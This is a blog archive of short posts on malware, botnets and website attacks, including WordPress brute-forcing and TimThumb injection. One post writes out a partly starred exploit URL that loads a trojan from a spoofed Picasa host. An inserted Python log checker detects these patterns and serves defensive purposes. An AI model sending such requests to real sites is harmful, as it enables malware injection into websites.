Category Archives: Malware

Malware, Trojans, Virus, Internet Security

Massive Number Websites in Botnet

Massive Number of Hacked USA Websites Participate in WordPress Botnet Attack

For the past couple of days we’ve been watching a customer’s WordPress site being attacked by a botnet of websites trying to access the site admin with the user name “admin” and a variety of simple passwords.

Most of these attacks are coming from USA-based web hosting services. One particular top-level service provider, Provo Unified Layer, stands out above the rest as the most hacked network. Many second-tier providers, including Bluehost and Hostmonster, use Provo Unified Layer infrastructure. Of the hosts using Provo Unified Layer infrastructure, Bluehost is ahead of the pack in having hosted sites participating in the botnet. (Read more about Bluehost and the Botnet).



WPOnlineStore PHP Fatal Error ‘function.require’

Googlebot Error with WPOnlineStore Plugin

Googlebot triggers a PHP Fatal Error ‘function.require’, causing the bot to receive a “500” internal server error when trying to crawl the pages created by the WordPress WPOnlineStore plugin. In my previous post I mentioned this ongoing problem. Today I can provide some additional information.

The problem is not unique to my shop site, although initial searches of the internet found only a few references to it. For the past two days the hosting company’s server engineers have been looking into the problem, unfortunately without any success. After disabling the Apache mod_security settings, which appeared to be causing the error, Googlebot still triggered it. As previously mentioned in Googlebot has Problems with WPOnlineStore, it is only Googlebot – and there lies the first clue.


Microsoft Security Essentials

Microsoft Security Essentials Under Microscope

A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from the most common threats? Can MSE compete with commercial security applications?

Over the next few months we will see.

Annoyed with Commercial AV Software

I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too many system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be detected only by AVG (which doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.


Picasa Spoofed for Malware Injection

Hackers Using Picasa Spoof for Web Malware

Strange-looking referer URLs and GET requests that appear to come from Picasa are being used by hackers to find website vulnerabilities and inject malware or spam. Examining the details of the referer reveals something like this example: /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in the string for your safety; the link leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!

Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or something similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
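As an added defender-side illustration (not code from the original posts), here is a small Python log check that flags both patterns described above: POSTs to wp-login.php arriving from many distinct IPs, the signature of a distributed botnet rather than one noisy host, and thumb.php requests or referers whose src parameter points to a remote host that merely contains “picasa” but is not under google.com. The log lines and the “.invalid” lookalike host are constructed samples, and the distinct-IP threshold is an assumed tuning value.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlparse

# Constructed Apache combined-log lines for illustration only (documentation IPs,
# reserved ".invalid" hostname); they are not traffic from the page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2013:10:00:01 +0000] "POST /wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Apr/2013:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Apr/2013:10:00:03 +0000] "POST /wp-login.php HTTP/1.1" 200 3521 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Apr/2013:10:00:04 +0000] "GET /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.lookalike.invalid/2.php HTTP/1.1" 403 211 "-" "Mozilla/4.0"
192.0.2.10 - - [10/Apr/2013:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 9001 "http://picasa.google.com/" "Mozilla/5.0"
"""

# Combined log format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
                    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')


def lookalike_picasa_host(url):
    """True when the hostname contains 'picasa' but is not under google.com."""
    host = (urlparse(url).hostname or "").lower()
    return "picasa" in host and host != "google.com" and not host.endswith(".google.com")


def remote_thumb_sources(*urls):
    """Collect remote src= values handed to a thumb.php (TimThumb) endpoint."""
    found = []
    for url in urls:
        parsed = urlparse(url)
        if parsed.path.endswith("thumb.php"):
            found += [s for s in parse_qs(parsed.query).get("src", [])
                      if s.startswith(("http://", "https://"))]
    return found


def analyse(log_text, min_login_ips=3):
    """Return (findings, login_ips): TimThumb findings per line, plus one
    'distributed-login' finding when wp-login.php POSTs come from many IPs."""
    login_ips, findings = Counter(), []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["method"] == "POST" and urlparse(m["path"]).path.endswith("/wp-login.php"):
            login_ips[m["ip"]] += 1
        for src in remote_thumb_sources(m["path"], m["referer"]):
            kind = "picasa-lookalike" if lookalike_picasa_host(src) else "remote-src"
            findings.append((m["ip"], kind, src))
    if len(login_ips) >= min_login_ips:  # per-IP rate limits miss this; count IPs, not hits
        findings.append(("*", "distributed-login", f"{len(login_ips)} IPs hit wp-login.php"))
    return findings, login_ips
```

A legitimate referer from picasa.google.com is left alone, because only a thumb.php src parameter naming a non-Google host containing “picasa” is treated as a spoof.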


Soccer Trojan from South Africa

Home Grown Malware?

[Image: satellite image of South Africa (from Wikipedia)]

It looks like the Trojan tvwjfm.exe (known by several other names too – list of known names and further information) could have originated from South Africa. At least the first reported infections came from this locale.

This is a change from the norm, where the largest percentage of new malware hails from the Asian Sub-Continent, although a tie-in to this region cannot be excluded.

This Trojan has not had a big impact; outbreaks so far seem to be limited, possibly deliberately targeting specific users. However, the few reported instances should not be taken to imply this Trojan is not dangerous – it is.

The file is unusually large for a Trojan, as it contains a package of other files. If run, it behaves like an application installer. Even if the install is cancelled, the Trojan installs other malware without the PC user’s knowledge.

Soccer Trojan

I have decided to unofficially name this Trojan (as yet it has no official name) the Soccer Trojan. It presents itself with an icon of a soccer ball superimposed over a PC display, similar to the image on the left, which is clearly an attempt to encourage followers of this ball game to run the file.

Hopefully the Soccer Trojan will remain obscure, and not spread. Our vigilance is required at this early stage to interdict the malware before it gets the opportunity to ‘go viral’ and escape into the wild.

Rove Digital Botnet Take-Down

Cyber-Criminals Arrested, US Offices Closed

A cyber criminal network operated by the Estonian company Rove Digital was taken down on November 8, 2011 in a combined effort involving the FBI (Federal Bureau of Investigation of the USA) and the Estonian Police, in co-operation with Trend Micro.

Rove Digital operated a botnet consisting of over four million (4,000,000) bots on computers infected with a class of malware known as ‘DNSChangers’. The infected systems typically have their Domain Name System (DNS) server settings changed to point to foreign IP addresses.

Rove Digital appears on the surface to be a legitimate business, with established offices in Tartu, Estonia. It is the parent company of several other operations, including Esthost, Estdomains, Cernel, UkrTelegroup and many less well-known shell companies.

Rove Digital used a variety of criminal methods to earn money from the DNS changers. The cyber crime network has operated since 2006.

Operation Ghost Click


Website Hacking Attack

Hacking Attempt from IP 86.96.226.87/8

An unsuccessful attempt to hack my website graphicline.co.za was made on Friday 21 October 2011, shortly before 15h00 SAST (13h00 GMT).

[Image: satellite view of the attack source location in Dubai (image from Google Earth)]

The attempt was first identified by repeated 404 ‘page not found’ and 403 ‘access forbidden’ messages, resulting from the hacker requesting URLs while trying to get access to the server and website setup files, and to log in to unauthorised and prohibited areas of the website and server. The server is set to send me notifications of 404, 403 and similar errors.

The attack originated from a business on the corner of Jumeirah Road and Sheikh Rashid Road, Jumeirah, Dubai, United Arab Emirates. The business is located in a warehouse or freight depot. This was identified from the IP addresses used during the attack, 86.96.226.87 and 86.96.226.88. It appears two hackers were working simultaneously.

I should thank these ill-intentioned persons for testing the security of the website and server. Each incident is an opportunity to examine security and to improve the strength of the server environment.


Trojan Generic24 Family

Article about Trojan Horse Generic24.cgol

The previous article posted on this blog about Generic 24 Trojans elicited a lot of interest. Even more interest was shown in my removal tips for the generic24.cgol variant, posted on my website.

I thought now would be a good time to post an update. The .cgol variety seems to have died down somewhat; however, it seems that every day a new version is detected. Recent references I found include:

  • trojan generic 24 cjgk (also generic24.cjgk) (20 Sept 2011)
  • trojan Generic24.BRQA
  • trojan Generic24.BRQD
  • trojan Generic24.BRQF etc (Full list at AVG)
  • Trojan Horse generic24.TSU (21 Sept 2011)
  • trojan Generic24.BUOM
  • Generic24.BVUA (22 Sept 2011)
  • trojan generic24 pnt (12 Sept 2011)
  • GENERIC 24.CPQJ (23 Sept 2011)
  • trojan-generic24-aawj (12 Sept 2011)
  • Trojan horse Generic24.CAVY (21 Sept 2011)
  • Generic24.BIVS (2 Sep 2011)
  • Generic24.FLZ (05 Oct 2011)
  • Trojan horse Generic24.PYB (01 Oct 2011)
  • Generic24.ATJW (03 Sept 2011)
  • Trojan horse Generic 24.WMQ (24 Sept 2011)

The list goes on; these are from recent forums and other articles found via a search engine, from September this year.

There are literally thousands of similar malware trojans with the name ‘generic’.

One common factor is they are generally considered hacking malware, opening a backdoor to other viruses which capture personal information from the user of an infected PC.

Again I stress the importance of early intervention should one of these trojans infect your PC.

The removal tips at the above web address can be used to fix most early infections by looking for registry (HKEY) references similar to those mentioned for Firefox.

More on Spam Comments

Support for Spam Commenting

Some people actually defend spam commenting!

Why would anyone support spam commenting? There are only two reasons I can think of.

  1. The supporter is so desperate for attention they get a sense of satisfaction from receiving any comment, even if it is just pure spam. Possible I suppose.
  2. More likely, the supporter of spam comments is a spammer. Obviously someone who spends their time generating spam, possibly even creating spambots and botnets, is not going to oppose spam comments. They want bloggers and web site owners to allow spam comments; that is where they derive their income from.

Stop Spam Commenting

This is my opinion. Stop spam by any technical means possible. If that means preventing public (unregistered) commenting, moderating comments strictly, or using CAPTCHA tools, feel free to do it (unless of course one wants to publish irrelevant spam comments on their articles).

Personally, I have no objection to signing in to one of my accounts, either WordPress.com, Facebook, Twitter, OpenID, creating a new account with the site, or filling in a CAPTCHA challenge – if I have something I think may be worth saying in a comment.

In a similar vein, I have no objection to allowing Twitter or Facebook to connect my accounts with WordPress.com – if I did not trust WordPress.com I would not blog on this platform. I have come across the objection from someone who doesn’t see why they should use their Twitter or Facebook account to log in in order to comment, thereby ‘letting me post articles to their account’. This is pure nonsense. Connecting with WordPress.com does not connect my blog with their profile. A statement saying ‘I do not want Joe Soap to post in my name’ simply indicates the remark comes from someone with little real-world understanding of web things, who suffers paranoid delusions, or who has possible ulterior motives – Freedom to Spam perhaps?

I have allowed the connection with WordPress.com to my Twitter accounts and Facebook – and I am yet to see any post to my wall, or a tweet from someone other than myself appearing as ‘coming from me’ or indeed in the timeline from anyone I do not follow on Twitter or a friend on Facebook. Maybe I will one day…

The idea that commenting using WordPress.com, Facebook or Twitter automatically allows someone to post or tweet using their identity is utter nonsense – unless it’s a malware app, in which case there are ways to deal with it. Internet security is always a concern. That is exactly why spam should be blocked.


Apple Mac Not Immune to Malware

Apple Macs do get Malware

How often do we still hear Mac users blithely proclaiming they have no need for Anti Virus software because Macs don’t get viruses? Well Mac users, those days are gone for good, if they ever existed at all.

The fact that what some regard as the world’s first virus, “Elk Cloner”, was a Mac virus seems to have slipped people’s minds.

The robustness of the Mac’s Unix core operating system perhaps makes it more difficult for malicious persons to write viruses and trojans for Macs. Also, in the old days Mac users were a very small group of computer users, mainly professionals involved in the print and graphics industries, not a big enough target for virus creators to spend their time on.

Mac users have been complacent, secure in the expectation that their systems are safe; at one time I was one of them. I used Macs for years with no AV software installed.

Recent Mac Viruses

Only a few months ago, the MacDefender Trojan Horse was happily infecting Macs around the world, and just today an article from Sophos Naked Security highlights another Mac trojan, OSX/Revir-B.

These Mac Trojans are not however the end of the story. Consider all the file sharing between Mac and Windows users in the commercial world.

Macs can pass on Windows Malware

How often do files get transferred from Mac to Windows platforms? How often do vulnerable removable drives get used to transfer these files?

Here is an example:
User A prepares work on a Mac. User A has no Anti Virus software because Macs are immune! Unknown to user A, a visit to a website has installed a Windows virus or trojan in a Word or Excel file. User A sends the file to user B, a Windows user. User B’s PC gets infected!

Or another example:
User A gets an e-mail containing malware and forwards it to User B. Once again User B’s PC gets infected.

Mac users, break the malware chain and get your Macs protected. The days of Mac immunity to malware are gone forever.